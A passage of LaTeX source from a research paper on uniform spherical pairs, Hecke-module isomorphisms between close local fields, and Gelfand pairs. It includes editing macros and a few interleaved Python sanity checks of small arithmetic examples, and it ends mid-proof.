\Upsilon$, we have $K_l \pi^\alpha K_l x= K_l \pi^\alpha x$.
\lbl{cond:GR}}
\end{enumerate}
\nir{If $G,H$ are defined over $\mathbb Z$, we say that the pair $(G,H)$ is uniform spherical if, for every $R$ as above, the pair $(G\times_{\Spec(\mathbb Z)}\Spec(R),H\times_{\Spec(\mathbb Z)}\Spec(R))$ is uniform spherical.
}
\end{defn}
In Section \ref{sec:ap} we give two examples of uniform spherical pairs. We now list several basic properties of uniform spherical pairs.
\RGRCor{In light of the recent developments in the structure theory of symmetric and spherical pairs (e.g. \cite{Del}, \cite{SV}),
we believe that the majority of symmetric pairs and many spherical pairs defined over local fields are specializations of appropriate uniform spherical pairs.}
From now until the end of the section we fix a uniform spherical pair $(G,H)$. First note that, since $H$ is smooth, the fibers of $G\to G/H$ are smooth. Hence the map $G\to G/H$ is smooth.
\begin{lem}\lbl{lem:SO} Let $(G,H)$ be a uniform spherical pair.
Let $x,y\in \pi^{\Upsilon} \mathfrak X$. Let $F$ be an $(R,\pi)$-local field. Then
$$S_{x,y}(O_F) = T_{x,y}(F) \cap G(O_F).$$
\end{lem}
\begin{proof}
The inclusion $S_{x,y}(O_F) \subset T_{x,y}(F) \cap G(O_F)$ is evident. In order to prove the other inclusion we have to show that any map $\psi: \Dima{\Spec(O_F)\to G \times _{\Spec R} \Spec O_F}$ such that $\Img (\psi|_{\Spec F}) \subset \Dima{T_{x,y} \times _{\Spec R[\pi^{-1}]} \Spec F}$ satisfies $\Img \psi \subset \Dima{S_{x,y} \times _{\Spec R} \Spec O_F}$.
This holds since $\Dima{S_{x,y} \times _{\Spec R} \Spec O_F}$ lies in the closure of $\Dima{T_{x,y} \times_{\Spec R[\pi^{-1}]} \Spec F}$ in $\Dima{G \times _{\Spec R} \Spec O_F}$.
\end{proof}
\begin{lem} \lbl{lem:rough.bijection} If $(G,H)$ is uniform spherical, then there is a subset $\Delta\subset \pi^\Upsilon \mathfrak X$ such that, for every $F\in\mathcal F_{R,\pi}$, the map $x\mapsto K_0(F)x$ is a bijection between $\Delta$ and $K_0(F)\backslash G(F)/H(F)$.
\end{lem}
\begin{proof} It is enough to show that for any $F,F'\in\mathcal F_{R,\pi}$ and for any $x,y\in \pi^\Upsilon \mathfrak X$, the equality $K_0(F)x=K_0(F)y$ is equivalent to $K_0(F')x=K_0(F')y$.
The scheme $S_{x,y}$ is smooth over $R$, and hence $S_{x,y}\otimes O_F$ is smooth over $O_F$. Therefore, it is formally smooth. This implies that the map $S_{x,y}(O_F) \to S_{x,y}(\mathbb F_q)$ is onto, and hence $\{g\in G(O_F)| gx=y\}\neq\emptyset$ if and only if $S_{x,y}(\mathbb F_q)\neq\emptyset$.
Hence, the two equalities
$K_0(F)x=K_0(F)y$ and
$K_0(F')x=K_0(F')y$ are both equivalent
to the condition $S_{x,y}(\mathbb F_q)\neq\emptyset$.
\end{proof}
From now until the end of the section we fix $\Delta$ as in the lemma.
\begin{prop} \lbl{prop:cond.ball} If $(G,H)$ is uniform spherical, then for every $x \in\pi^\Upsilon \mathfrak X$ and every $\ell\in\mathbb N$, there is $M\in\mathbb N$ such that for every $F\in\mathcal F_{R,\pi}$, the set $K_\ell(F)x$ contains a ball of radius $M$ around $x$.
\end{prop}
\begin{proof}
Since, for every $\delta\in X_*(T)$ and every $\ell\in\mathbb N$, there is $n\in\mathbb N$ such that $K_n(F) \subset \pi^\delta K_\ell(F)\pi^{-\delta}$ for every $F$, we can assume that $x \in \mathfrak X$. The claim now follows from the following version of the implicit function theorem.
\begin{lem} \lbl{lem:ball.crit}
Let $F$ be a local field. Let $X$ and $Y$ be affine schemes defined over $O_F$. Let $\psi:X \to Y$ be a smooth morphism defined
over $O_F$. Let $x \in X(O_F)$ and $y:=\psi(x)$. Then
$\psi(B(x,\ell)(F)) = B(y,\ell)(F)$ for any natural number $\ell$.
\end{lem}
\begin{proof}
The inclusion $\psi(B(x,\ell)(F)) \subset B(y,\ell)(F)$ is clear. We prove the inclusion
$\psi(B(x,\ell)(F)) \supset B(y,\ell)(F).$\\
Case 1: $X$ and $Y$ are affine spaces and $\psi$ is etale. The proof is standard.\\
Case 2: $Y=\mathbb A^m$ and $\psi$ is etale: We can assume that $X\subset \mathbb A^{m+n}$ is defined by $f_1,\ldots,f_n$ with independent differentials, and that $\psi$ is the projection to the first $m$ coordinates. The proof in this case follows from Case 1 by considering the map $\Phi:\mathbb A^{m+n}\to\mathbb A^{m+n}$ given by $\Phi(x_1,\ldots,x_{m+n})=(x_1,\ldots,x_m,f_1,\ldots,f_n)$.\\
Case 3: $\psi$ is etale: Follows from Case 2 by restriction from the ambient affine spaces.\\
Case 4: In general, a smooth morphism is a composition of an etale morphism and a projection, for which the claim is trivial.
\end{proof}
\end{proof}
\begin{lem} \lbl{lem:cond.fin} For every $\lambda \in X_*(T)$ and $x \in \pi^{\Upsilon}\mathfrak X$, there is a finite subset $B \subset\pi^{\Upsilon}\mathfrak X$ such that $\pi^\lambda K_0(F)x\subset\bigcup_{y\in B} K_0(F)y$ for all $F\in\mathcal F_{R,\pi}$.
\end{lem}
\begin{proof}
Write $x=\pi^\delta x_0$ with $\delta\in\Upsilon$ and $x_0\in\mathfrak X$. By Lemma \ref{lem:rough.bijection}, we can assume that the sets $K_0(F)\pi^\eta x_0$ for $\eta\in\Upsilon$ are disjoint. There is a constant $C$ such that for every $F$ and for every $g\in\pi^\lambda K_0(F)\pi^\delta$, $val_F(gx_0)\geq C$. Fix $F$ and assume that $g\in K_0(F)\pi^\lambda K_0(F)\pi^\delta$. From the proof of Proposition \ref{prop:cond.ball}, it follows that $K_0(F)gx_0$ contains a ball whose radius depends only on $\lambda$ and $\delta$. Since $F$ is locally compact, there are only finitely many disjoint such balls in the set $\{y\in G(F)/H(F) \,|\, val_F(y)\geq C\}$, so there are only finitely many $\eta\in\Upsilon$ such that $val_F(\pi^\eta x_0) \geq C$. By definition, this finite set, $S$, does not depend on the field $F$. Therefore, $\pi^\lambda K_0(F)\pi^\delta x_0\subset\bigcup_{\eta\in S} K_0(F)\pi^\eta x_0$.
\end{proof}
\RGRCor{
\begin{notation}
$ $
\begin{itemize}
\item Denote by $\mathcal M_\ell(G(F)/H(F))$ the space of $K_\ell(F)$-invariant
compactly supported measures on $G(F)/H(F)$.
\item For a $K_\ell$-invariant subset $U \subset G(F)/H(F)$ we denote by $1_U \in \mathcal M_\ell(G(F)/H(F))$ the Haar measure on $G(F)/H(F)$
multiplied by the characteristic function of $U$ and normalized so that its integral is $1$. We define $1_V \in \mathcal H_{\ell}(G,F)$ similarly for a $K_\ell$-bi-invariant subset $V \subset G(F)$.
\end{itemize}
\end{notation}
}
\RGRCor{
\begin{prop} \lbl{prop:FG}
If $(G,H)$ is uniform spherical then $\mathcal M_\ell(G(F)/H(F))$ is finitely generated over $\mathcal H_{\ell}(G,F)$ for any $\ell$.
\end{prop}
\begin{proof}
As in step 4 of Lemma \ref{VKFinGen}, it is enough to prove the assertion for large enough $\ell$. Thus we may assume that for every $x \in \mathfrak X$ and $\alpha \in
\Upsilon$ we have $K_\ell \pi^\alpha K_\ell x= K_\ell \pi^\alpha x $. Therefore,
$1_{K_\ell \pi^\alpha K_\ell}1_{K_\ell x}=1_{K_\ell \pi^\alpha x}$. Hence for any $g\in K_0/K_\ell$ we have
$(g 1_{K_\ell \pi^\alpha K_\ell})1_{K_\ell x}=1_{gK_\ell \pi^\alpha x}$. \DimaGRCor{Now, the elements $1_{gK_\ell \pi^\alpha x}$ span $\mathcal M_\ell(G(F)/H(F))$ by condition \ref{cond:1} in Definition \ref{defn:good.pair}. } This implies that the elements $1_{K_\ell x}$ generate $\mathcal M_\ell(G(F)/H(F))$.
\end{proof}
}
\subsection{Close Local Fields}\lbl{subsec:CloseLocalFields}
\begin{defn} Two $(R,\pi)$-local fields $F,E\in\mathcal F_{R,\pi}$ are $n$-close if there is an isomorphism $\phi_{F,E}:O_F/\pi^n\to O_E/\pi^n$ such that the two maps $R\to O_F\to O_F/\pi^n\to O_E/\pi^n$ and $R\to O_E\to O_E/\pi^n$ coincide. In this case, $\phi_{F,E}$ is unique.
\end{defn}
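A standard illustration (ours; this example is not spelled out in the text): for $F=\mathbb Q_p$ and $E=\mathbb F_p((t))$ with uniformizers $p$ and $t$, both residue rings $O/\pi$ equal $\mathbb F_p$, so the two fields are $1$-close. They are not $2$-close, since $1$ has additive order $p^2$ in $\mathbb Z_p/p^2$ but additive order $p$ in $\mathbb F_p[[t]]/t^2$. A quick Python check of that arithmetic (the modeling of the truncated rings is ours):

```python
# Model O/pi^n for two 1-close fields with residue field F_p:
# F = Q_p, where O_F/p^n = Z/p^n, and E = F_p((t)), where O_E/t^n = F_p[t]/t^n.
p, n = 5, 2

# additive order of 1 in Z/p^2
ord_Qp = next(m for m in range(1, p**n + 1) if m % p**n == 0)
# additive order of 1 in F_p[t]/t^2 (coefficients live in F_p)
ord_laurent = next(m for m in range(1, p**n + 1) if m % p == 0)

assert ord_Qp == p**n and ord_laurent == p  # the rings differ mod pi^2
print(ord_Qp, ord_laurent)                  # 25 5
```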
\begin{thm}[\cite{Kaz}]
Let $F$ be an $(R,\pi)$ local field. Then, for any $\ell$, there exists $n$ such that, for any $E\in\mathcal F_{R,\pi}$, which is $n$-close to $F$, there exists a unique isomorphism $\Phi_{\mathcal H,\ell}$ between the algebras $\mathcal H_{\ell}(G,F)$ and $\mathcal H_{\ell}(G,E)$ that maps the Haar measure on $K_{\ell}(F)\pi^\lambda K_{\ell}(F)$ to the Haar measure on $K_{\ell}(E)\pi^\lambda K_{\ell}(E)$, for every $\lambda\in X_*(T)$, and intertwines the actions of the finite group $K_0(F)/K_{\ell}(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_{\ell}(E)$.
\end{thm}
In this section we prove the following refinement of Theorem \ref{thm:ModIso} from the Introduction:
\begin{thm} \lbl{thm:phiModIso} Let $(G,H)$ be a uniform spherical pair.
\Removed{
Suppose that the module $\mathcal M_\ell(G(F)/H(F))$ is finitely generated over the Hecke algebra $\mathcal H(G(F),K_\ell(F))$ for any $F\in\mathcal F_{R,\pi}$ and $\ell \in \mathbb N$. }
Then, for any $\ell \in \mathbb N$ and $F\in\mathcal F_{R,\pi}$, there exists $n$ such that, for any $E\in\mathcal F_{R,\pi}$ that is $n$-close to $F$, there exists a unique map $$\mathcal M_\ell(G(F)/H(F)) \to \mathcal M_\ell(G(E)/H(E))$$ which is an isomorphism of modules over the Hecke algebra $$\mathcal H(G(F),K_\ell(F))\stackrel{\Phi_{\mathcal H,\ell}}{\cong} \mathcal H(G(E),K_\ell(E))$$ that maps the Haar measure on $K_\ell(F)x$ to the Haar measure on $K_\ell(E)x$, for every $x\in\Delta\subset\pi^{\Upsilon}\mathfrak X$, and intertwines the actions of the finite group $K_0(F)/K_\ell(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_\ell(E)$.
\end{thm}
For the proof we will need notation and several lemmas.
\begin{notation}
For any valued field $F$ with uniformizer $\pi$ and any integer $m \in \mathbb Z$, we
denote by $res_m:F \to F / \pi^m O_F$ the projection. Note that, for every $m$, multiplication by $\pi^{m-n}$ induces a natural isomorphism $O_F/\pi^n O_F\cong\pi^{m-n}O_F/\pi^{m}O_F$.
Hence if two local fields $F,E\in\mathcal F_{R,\pi}$ are $n$-close,
then for any $m$ we obtain an isomorphism, which we also denote by $\phi_{F,E}$, between $\pi^{m-n} O_F/\pi^{m}O_F$ and $\pi^{m-n} O_{E} /\pi^{m}O_{E}$, which are subgroups of
$F/\pi^{m}O_F$ and $E/\pi^{m}O_{E}$.
\end{notation}
\begin{lem} \lbl{lem:equal.stabilizers} Suppose that $(G,H)$ is a uniform spherical pair, and suppose that $F,E\in\mathcal F_{R,\pi}$ are $\ell$-close. Then for all $\delta\in\Delta$,
\[
\phi_{F,E}(\Stab_{K_0(F)/K_\ell(F)}K_\ell(F) \delta )=\Stab_{K_0(E)/K_\ell(E)}K_\ell(E) \delta.
\]
\end{lem}
\begin{proof} The stabilizer of $K_\ell(F)\delta$ in
$K_0/K_\ell$ is the projection of the stabilizer of $\delta$
in $K_0$ to $K_0/K_\ell$. In other words, it is the image of
$S_{\delta,\delta}(O_F)$ in $S_{\delta,\delta}(O_F/\pi^\ell)$.
Since
$S_{\delta,\delta}$ is smooth over $R$, it is smooth over $O_F$. Hence $S_{\delta,\delta}$ is formally smooth, and so
this map is onto. The same applies to the stabilizer of
$K_\ell(E)\delta$ in $K_0(E)/K_\ell(E)$, and
$\phi_{F,E}(S_{\delta,\delta}(O_F/\pi^\ell))=S_{\delta,\delta}(O_E/\pi^\ell)$.
\end{proof}
\begin{cor}\lbl{cor:LinIso}
Let $\ell \in \mathbb N$.
\Removed{Suppose that the module $\mathcal M_\ell(G(F)/H(F))$ is finitely generated over the Hecke algebra $\mathcal H(G(F),K_\ell(F))$ for any $F\in\mathcal F_{R,\pi}$. }
Then, for any $F,E\in\mathcal F_{R,\pi}$ that are $\ell$-close, there exists a unique \Dima{morphism
of vector spaces $$\Phi_{\mathcal M,\ell}:\mathcal M_\ell(G(F)/H(F)) \to \mathcal M_\ell(G(E)/H(E))$$ that maps the Haar measure on $K_\ell(F)x$ to the Haar measure on $K_\ell(E)x$, for every $x\in\Delta$, and intertwines the actions of the finite group $K_0(F)/K_{\ell}(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_{\ell}(E)$.} \Dima{Moreover, this morphism is an isomorphism.}
\end{cor}
\begin{proof}
The uniqueness is evident.
By Lemma \ref{lem:equal.stabilizers} and Lemma \ref{lem:rough.bijection},
the map between $K_\ell(F)\backslash G(F)/H(F)$ and $K_\ell(E)\backslash G(E)/H(E)$ given by
\[
K_\ell(F) g\delta \mapsto K_\ell(E) g'\delta,
\]
where $g\in K_0(F)$ and $g'\in K_0(E)$ satisfy that
$\phi_{F,E}(res_\ell(g))=res_\ell(g')$, is a bijection.
This bijection gives the required isomorphism.
\end{proof}
\begin{remark}
A similar construction can be applied to the pair $(G\times G,\Delta G)$. In this case, the main result of \cite{Kaz} is that the obtained linear map $\Phi_{\mathcal H,\ell}$ between the Hecke algebras $\mathcal H(G(F),K_\ell(F))$ and $\mathcal H(G(E),K_\ell(E))$ is an isomorphism of algebras if the fields $F$ and $E$ are close enough.
\end{remark}
The following lemma is evident:
\begin{lem} Let $P(x)\in R[\pi^{-1}][x_1,\ldots,x_d]$ be a polynomial. For any natural numbers $M$ and $k$, there is $N$ such that, if $F,E\in\mathcal F_{R,\pi}$ are $N$-close, and $x_0\in \pi^{-k}O_F^d,y_0\in \pi^{-k}O_E^d$ satisfy that $P(x_0)\in \pi^{-k}O_F$ and $\phi_{F,E}(res_{N}(x_0))=res_{N}(y_0)$, then $P(y_0)\in \pi^{-k}O_E$ and $\phi_{F,E}(res_{M}(P(x_0)))=res_{M}(P(y_0))$.
\end{lem}
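The lemma can be exercised on a toy example (entirely ours: we model $R=\mathbb Z$ and $\pi=3$, and replace $N$-closeness of inputs by congruence mod $3^N$ inside a single field): for $P(x)=x^2/3+2x \in \mathbb Z[3^{-1}][x]$, inputs that agree mod $3^5$ produce integral outputs that agree mod $3^4$:

```python
from fractions import Fraction

p, N, M = 3, 5, 4
P = lambda x: Fraction(x * x, p) + 2 * x  # coefficients in Z[1/3]

x0 = 6               # P(x0) = 24 is integral
y0 = x0 + p**N       # y0 agrees with x0 mod p^N

assert P(x0).denominator == 1 and P(y0).denominator == 1
assert (int(P(y0)) - int(P(x0))) % p**M == 0  # outputs agree mod p^M
```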
\begin{cor} Suppose that $(G,H)$ is a uniform spherical pair.
Fix an embedding of $G/H$ to an affine space $\mathbb A^d$. Let $\lambda \in X_*(T)$, $x \in \pi^{\Upsilon}\mathfrak X$, $F\in\mathcal F_{R,\pi}$, and $k \in G(O_F)$. Choose $m$ such that $\pi^{\lambda} k x \in \pi^{-m}O_F^d$. Then, for every $M$, there is $N\geq M+m$ such that, for any $E\in\mathcal F_{R,\pi}$ that is $N$-close to $F$, and for any $k' \in G(O_E)$ such that $\phi_{F,E}(res_N(k))=res_N(k')$,
\[
\pi^{\lambda} k' x \in G(E)/H(E) \cap \pi^{-m}O_E^d \text{ and } \phi_{F,E}(res_M(\pi^{\lambda} k x))=res_M(\pi^{\lambda} k' x).
\]
\end{cor}
\begin{cor} Suppose that $(G,H)$ is a uniform spherical pair.
Fix an embedding of $G/H$ to an affine space $\mathbb A^d$. Let $m$ be an integer. For every $M$, there is $N$ such that, for any $F,E\in\mathcal F_{R,\pi}$ that are $N$-close, any $x \in G(F)/H(F) \cap \pi^{-m}O_F^d$ and any $y\in G(E)/H(E) \cap \pi^{-m}O_E^d$, such that $\phi_{F,E}(res_{N-m}(x))=res_{N-m}(y)$, we have $\Phi_{\mathcal M}(1_{K_M(F)} x) = 1_{K_M(E)} y$.
\end{cor}
\begin{proof}
Let $k_F \in G(O_F)$ and $\delta \in \Delta$ be such that $x=k_F\delta$. By Proposition \ref{prop:cond.ball}, there is an $l$ such that, for any $L\in\mathcal F_{R,\pi}$ and any $k_L \in
G(O_L)$, the set $K_M(L)k_L\delta$ contains a ball of radius $l$.
Using the previous corollary, choose an integer $N$ such that, for any $F$ and $E$ that are $N$-close and any $k_E \in G(O_E)$, such that $\phi_{F,E}(res_N(k_F))=res_N(k_E)$, we have
\[
k_E \delta \in (G(E)/H(E)) \cap \pi^{-m}O_E^d \text{ and }\phi_{F,E}(res_l(x))=res_l(k_E \delta).
\]
Choose such $k_E \in G(O_E)$ and let $z = k_E \delta$. Since $res_l(z)=\phi_{F,E}(res_l(x))=res_l(y)$, we have that $z \in B(y,l)$, and hence $z \in K_M(E)y$. Hence
\[
1_{K_M(E)}y=1_{K_M(E)}z = \Phi_{\mathcal M}(1_{K_M(F)} x).
\]
\end{proof}
From the last two corollaries we obtain the following one.
\begin{cor}\lbl{cor:CharFun} Given $\ell \in \mathbb N$, $\lambda \in X_*(T)$, and $\delta \in \Delta$, there is $n$ such that if $F,E\in\mathcal F_{R,\pi}$ are $n$-close, and $g_F\in G(O_F),g_E\in G(O_E)$ satisfy that $\phi_{F,E}(res_n(g_F))=res_n(g_E)$, then $\Phi_{\mathcal M,\ell}(1_{K_\ell(F)} \pi^\lambda g_F \delta)=1_{K_\ell(E)}\pi^\lambda g_E \delta$.
\end{cor}
\begin{prop} \lbl{prop:local.isom} Let $F\in\mathcal F_{R,\pi}$. Then for every $\ell$, and every two elements $f\in\mathcal H_\ell(F)$ and $v\in\mathcal M_\ell(F)$, there is $n$ such that, if $E\in\mathcal F_{R,\pi}$ is $n$-close to $F$, then $\Phi_{\mathcal M,\ell}(f\cdot v)=\Phi_{\mathcal H,\ell}(f)\cdot\Phi_{\mathcal M,\ell}(v)$.
\end{prop}
\begin{proof} By linearity, we can assume that $f = 1_{K_\ell(F)} k_1 \pi^\lambda k_2
1_{K_\ell(F)}$ and that $v= 1_{K_\ell(F)} k_3\delta$, where
$k_1,k_2,k_3\in K_0(F)$. Choose $N \geq \ell$ big enough so that
$\pi^\lambda K_N(F) \pi^{-\lambda} \subset K_\ell(F)$.
Choose $k_i'\in G(O_E)$ such that $\phi_{F,E}(res_N(k_i))=res_N(k_i')$.
Since $\Phi_{\mathcal M,\ell}$ and $\Phi_{\mathcal H,\ell}$ intertwine left multiplication by
$1_{K_\ell(F)} k_1 1_{K_\ell(F)}$ to left multiplication by $1_{K_\ell(E)}
k'_1 1_{K_\ell(E)}$, we can assume that $k_1=1=k'_1$. Also, since
$k_2$ normalizes $K_\ell(F)$, we can assume that $k_2=1=k'_2$. Let
$K_\ell(F)=\bigcup_{i=1}^s K_N(F) g_i$ be a decomposition of $K_\ell(F)$
into cosets. Choose $g'_i\in K_\ell(E)$ such that
$\phi_{F,E}(res_N(g_i))=res_N(g'_i)$. Then
\[
1_{K_\ell(F)}=c\sum_{i=1}^s 1_{K_N(F)} g_i \text{ and } 1_{K_\ell(E)}=c\sum_{i=1}^s 1_{K_N(E)} g'_i
\]
where $c=|K_\ell(F)/K_N(F)|=|K_\ell(E)/K_N(E)|$. Hence
\[
fv=1_{K_\ell(F)} \pi^\lambda 1_{K_\ell(F)} k_3 \delta =c\sum_{i=1}^s
1_{K_\ell(F)} \pi^\lambda 1_{K_N(F)} g_i k_3 \delta =c\sum_{i=1}^s
1_{K_\ell(F)} \pi^\lambda g_i k_3 \delta
\]
and
\[
\Phi_{\mathcal H,\ell}(f)\Phi_{\mathcal M,\ell}(v)=1_{K_\ell(E)} \pi^\lambda 1_{K_\ell(E)} k'_3 \delta=c\sum_{i=1}^s 1_{K_\ell(E)} \pi^\lambda 1_{K_N(E)} g'_i k'_3\delta =c\sum_{i=1}^s 1_{K_\ell(E)} \pi^\lambda g'_i k'_3 \delta.
\]
The proposition follows now from Corollary \ref{cor:CharFun}.
\end{proof}
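The equality $|K_\ell(F)/K_N(F)|=|K_\ell(E)/K_N(E)|$ behind the constant $c$ holds because the index depends only on the residue field: for $G=\GL_r$ it equals $q^{(N-\ell)r^2}$. A brute-force sanity check (our own, for $\GL_2$ over $\mathbb Z/9$, i.e., residue field $\mathbb F_3$ with $\ell=1$, $N=2$):

```python
from itertools import product

q, r = 3, 2  # residue field F_3, G = GL_2: count K_1/K_2 over Z/9

def invertible_mod(mat, modulus):
    # brute-force invertibility of the determinant mod the given modulus
    a, b, c, d = mat
    det = (a * d - b * c) % modulus
    return any((det * u) % modulus == 1 for u in range(modulus))

# matrices over Z/9 of the form Id + 3B with B ranging over Mat_2(Z/3)
elems = [(1 + q * b00, q * b01, q * b10, 1 + q * b11)
         for b00, b01, b10, b11 in product(range(q), repeat=4)]
count = sum(invertible_mod(e, q**2) for e in elems)

assert count == q ** (r * r)  # 81 = 3^{(2-1)*2^2}
print(count)                  # 81
```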
Now we are ready to prove Theorem \ref{thm:phiModIso}.
\begin{proof}[Proof of Theorem \ref{thm:phiModIso}]
We have to show that for any $\ell$ there exists $n$ such that, if $F,E\in \mathcal F_{R,\pi}$ are $n$-close, then the map
$\Phi_{\mathcal M,\ell}$ constructed in Corollary \ref{cor:LinIso} is an isomorphism of modules over $\mathcal H(G(F),K_\ell(F))\stackrel{\Phi_{\mathcal H,\ell}}{\cong} \mathcal H(G(E),K_\ell(E))$.
By Proposition \ref{prop:FG}, $\mathcal M_\ell(G(F)/H(F))$ is finitely generated over $\mathcal H(G(F),K_\ell(F))$; since this algebra is Noetherian, $\mathcal M_\ell(G(F)/H(F))$ is generated by a finite set $v_1,\ldots,v_r$ satisfying a finite set of relations $\sum_i f_{i,j}v_i=0$.
\RGRCor{Without loss of generality we may assume that, for every $x \in \mathfrak X$, the normalized Haar measure on $K_\ell(F)x$ is among the generators $v_i$.}
By Proposition \ref{prop:local.isom}, if $E$ is close enough to $F$, then $\Phi_{\mathcal M,\ell}(v_i)$ satisfy the above relations.
Therefore there exists a homomorphism of Hecke modules $\Phi':\mathcal M_\ell(G(F)/H(F))\to\mathcal M_\ell(G(E)/H(E))$ given on the generators $v_i$ by $\Phi'(v_i):= \Phi_{\mathcal M,\ell}(v_i)$. \\ \RGRCor{
$\Phi'$ intertwines the actions of the finite group $K_0(F)/K_{\ell}(F)\stackrel{\phi_{F,E}}{\cong}K_0(E)/K_{\ell}(E)$. Therefore, by Corollary \ref{cor:LinIso}, in order to show that $\Phi'$ coincides with $\Phi_{\mathcal M,\ell}$ it is enough to check that $\Phi'$ maps the normalized Haar measure on $K_\ell(F)x$ to the normalized Haar measure on $K_\ell(E)x$ for every $x\in\Delta$. In order to do this, let us decompose $x=\pi^\alpha x_0$, where
$x_{0} \in \mathfrak X$ and $\alpha \in \Upsilon$. Now, since $(G,H)$ is uniform spherical, we have $$1_{K_\ell(F) x}=1_{K_\ell(F) \pi^\alpha K_\ell(F)}1_{K_\ell(F) x_0}$$ and $$1_{K_\ell(E) x}=1_{K_\ell(E) \pi^\alpha K_\ell(E)}1_{K_\ell(E) x_0}.$$ Therefore, since $\Phi'$ is a homomorphism, we have $$\Phi'(1_{K_\ell(F) x})=\Phi'(1_{K_\ell(F) \pi^\alpha K_\ell(F)}1_{K_\ell(F) x_0})= 1_{K_\ell(E) \pi^\alpha K_\ell(E)}1_{K_\ell(E) x_0}=1_{K_\ell(E) x}.$$
}
Hence the linear map $\Phi_{\mathcal M,\ell}:\mathcal M_\ell(G(F)/H(F))\to\mathcal M_\ell(G(E)/H(E))$ is a homomorphism of Hecke modules. Since it is a linear isomorphism, it is an isomorphism of Hecke modules.
\end{proof}
Now we obtain \Dima{the following generalization of }Corollary \ref{cor:GelGel}:
\begin{cor}\lbl{cor:GelGel2}
Let $(G,H)$ be a uniform spherical pair. Suppose that
\begin{itemize}
\item For any $F\in\mathcal F_{R,\pi}$, the pair $(G,H)$ is $F$-spherical.
\Removed{
\item For any $F\in\mathcal F_{R,\pi}$ and any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .$$}
\item
\Dima{For any $E\in\mathcal F_{R,\pi}$ and natural number $n$, there is a field $F\in\mathcal F_{R,\pi}$ such that $E$ and $F$ are $n$-close and the pair $(G(F),H(F))$ is a Gelfand pair, i.e. for any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) \leq 1 .$$}
\end{itemize}
Then $(G(F),H(F))$ is a Gelfand pair for any $F\in\mathcal F_{R,\pi}$.
\end{cor}
\nir{\begin{rem} Fix a prime power $q=p^k$. Let $F$ be the unramified extension of $\mathbb Q_p$ of degree $k$, let $W$ be the ring of integers of $F$, and let $R=W[[\pi]]$. Then \Dima{$\mathcal F_{R,\pi}$ includes all local fields with residue field $\mathbb F_q$,} and so Corollary \ref{cor:GelGel2} implies Corollary \ref{cor:GelGel}.
\end{rem}}
Corollary \ref{cor:GelGel2} follows from \Dima{Theorem \ref{thm:phiModIso}},
Theorem
\ref{FinGen}, and the following lemma.
\begin{lem}
Let $F$ be a local field and $H<G$ be a pair of reductive groups
defined over $F$. \Dima{Suppose that $G$ is split over $F$.}
Then $(G(F),H(F))$ is a Gelfand pair if and only
if for any \Dima{large enough }$\ell \in \mathbb Z_{>0}$ and any simple module $\rho$ over
$\mathcal H_\ell(G(F))$ we have
$$ \dim \Hom_{\mathcal H_\ell(G(F))} (\mathcal M_\ell(G(F)/H(F)), \rho) \leq 1.$$
\end{lem}
This lemma follows from statement (\ref{1}) formulated in Subsection
\ref{subsec:prel}.
\section{Applications}
\lbl{sec:ap}
\setcounter{thm}{0}
In this section we prove that the pair
$(\GL_{n+k}(F),\GL_n(F) \times\GL_k(F))$ is a Gelfand pair for any
local field $F$ of characteristic different from 2 and the pair
$(\GL_{n+1}(F),\GL_n(F) )$ is a strong Gelfand pair for any local
field $F$. We use \Dima{Corollary \ref{cor:GelGel2} }
to deduce those results from the
characteristic zero cases, which were proven in \cite{JR} and
\cite{AGRS}, respectively.
\Dima{Let $R=W[[\pi]]$.}
To verify condition (\ref{cond:connectors}) in Definition \ref{defn:good.pair}, we use the following straightforward lemma:
\begin{lem} \lbl{lem:SmoothCrit}
Let $G= (\GL_{n_1})_R \times \cdots \times (\GL_{n_k})_R$ and let $C<G \otimes_R R[\pi^{-1}]$
be a sub-group scheme defined over $R[\pi^{-1}]$. Suppose that $C$ is defined by equations of the
following type:
$$ \sum_{i=1}^{l} \epsilon_i a_{\mu_i} \pi^{\lambda_i} = \pi^{\nu},$$
or
$$ \sum_{i=1}^{l} \epsilon_i a_{\mu_i} \pi^{\lambda_i} = 0,$$
where $\epsilon_i = \pm 1$, $a_1,...,a_{n_1^2+...+n_k^2}$ are entries
of matrices, $1 \leq \mu_i \leq n_1^2+...+n_k^2$ are some indices,
and $\nu,\lambda_i$ are integers. Suppose also that the indices
$\mu_i$ are distinct for all the equations. Then the closure
$\overline{C}$ of $C$ in $G$ is smooth over $R$.
\end{lem}
\DimaGRCor{To verify condition (\ref{cond:GR}) in Definition
\ref{defn:good.pair}, we use the following straightforward lemma:
\begin{lem} \lbl{lem:GRCrit}
Suppose that there exists a natural number $\ell_0$ such that, for any $F\in\mathcal F_{R,\pi}$ and any $\ell>\ell_0$, there is a subgroup $P_\ell<K_\ell(G,F)$ satisfying that
for every $x \in \mathfrak X$
\begin{enumerate}
\item For any $\alpha \in \Upsilon$ we have $\pi^\alpha P_\ell
\pi^{-\alpha} \subset K_\ell$.
\item $K_\ell x = P_\ell x$.
\end{enumerate}
Then condition (\ref{cond:GR}) in Definition \ref{defn:good.pair}
is satisfied.
\end{lem}}
In our applications, we use the following to show that the pairs we consider are $F$-spherical.
\begin{prop} \label{peop:F.sph} Let $F$ be an infinite field, and consider $G=\GL_{n_1}\times\cdots\times\GL_{n_k}$ embedded in the standard way in $M=\M_{n_1}\times\cdots\times\M_{n_k}$. Let $A,B\subset G \otimes F$ be two $F$-subgroups whose closures in $M$ are affine subspaces $M_A,M_B$.
\begin{enumerate}
\item For any $x,y\in G(F)$, if the variety $\{(a,b)\in A\times B | axb=y\}$ is non-empty, then it has an $F$-rational point.
\item If $(G,A)$ is a spherical pair, then it is also an $F$-spherical pair.
\end{enumerate}
\end{prop}
\begin{proof} \begin{enumerate}
